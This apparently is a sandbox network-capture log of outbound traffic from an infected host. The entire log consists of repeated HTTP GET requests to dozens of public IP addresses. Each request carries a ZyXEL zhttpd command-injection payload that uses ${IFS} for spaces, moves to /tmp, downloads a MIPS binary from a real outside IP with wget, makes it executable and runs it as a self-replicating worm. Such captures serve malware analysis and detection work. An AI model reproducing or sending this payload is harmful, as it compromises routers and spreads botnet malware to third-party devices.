                                                        Jan 28, 2024 10:13:11.770512104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9288192.168.2.1459518142.228.31.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770534039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9289192.168.2.1435442117.111.232.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770565987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9290192.168.2.1450940104.19.48.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770622969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9291192.168.2.1459044156.4.174.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770668983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9292192.168.2.145017280.253.222.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770701885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9293192.168.2.1451866139.157.195.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770730972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9294192.168.2.145926860.243.218.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770793915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9295192.168.2.1433582166.247.2.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770821095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9296192.168.2.1439128115.36.57.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770854950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9297192.168.2.1451278174.230.4.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770904064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9298192.168.2.1456752181.116.90.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770944118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9299192.168.2.144625298.51.227.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770991087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9300192.168.2.143604834.130.173.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771015882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9301192.168.2.1438404207.85.5.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771081924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9302192.168.2.143698440.228.73.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771122932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9303192.168.2.1437874105.36.145.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771146059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9304192.168.2.144082667.25.106.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771178961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9305192.168.2.146015645.26.148.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771226883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9306192.168.2.1453742186.30.33.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771250010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9307192.168.2.146026472.96.116.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771291971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9308192.168.2.1438786143.244.32.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771322012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9309192.168.2.1455886112.33.13.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771358967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9310192.168.2.145516032.27.194.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771399975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9311192.168.2.14548324.57.167.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771421909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9312192.168.2.1459970181.251.213.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771441936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9313192.168.2.145220447.16.76.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771481991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9314192.168.2.144613283.167.2.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771544933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9315192.168.2.1434194158.146.231.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771594048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9316192.168.2.1445236211.54.161.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771625996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9317192.168.2.1438434128.73.215.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771660089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9318192.168.2.1440094102.98.75.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771698952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9319192.168.2.1449626115.53.58.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771742105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9320192.168.2.1445378158.95.108.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771797895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9321192.168.2.1450518221.212.224.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771837950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9322192.168.2.1444240152.74.38.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771878004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9323192.168.2.1435256192.47.233.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771915913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9324192.168.2.1460926197.157.206.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771946907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9325192.168.2.1433786201.228.51.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.771990061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9326192.168.2.1456248182.3.127.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772025108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9327192.168.2.1448970197.102.55.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772052050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9328192.168.2.1452534212.43.124.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772109985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9329192.168.2.1434688176.18.108.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772136927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9330192.168.2.145027082.120.1.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772203922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9331192.168.2.1444774107.170.44.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772228003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9332192.168.2.144779250.161.33.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772285938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9333192.168.2.1458816119.254.222.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772315025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9334192.168.2.1443320123.32.90.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772352934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9335192.168.2.144887268.72.66.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772401094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9336192.168.2.1445096143.20.212.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772433996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9337192.168.2.1454234107.138.220.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772454023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9338192.168.2.1441268142.110.128.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772501945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9339192.168.2.145171270.245.244.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772524118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9340192.168.2.1446072208.93.78.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772561073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9341192.168.2.145981250.128.181.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772584915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9342192.168.2.1445742108.77.3.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772643089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9343192.168.2.1447506220.253.107.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772680998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9344192.168.2.14579608.177.59.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772717953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9345192.168.2.1451136196.36.28.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772761106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9346192.168.2.1455878147.129.27.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772799015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9347192.168.2.1439694110.13.124.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772859097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9348192.168.2.145719676.74.176.76443
                                                        TimestampBytes transferredDirectionData
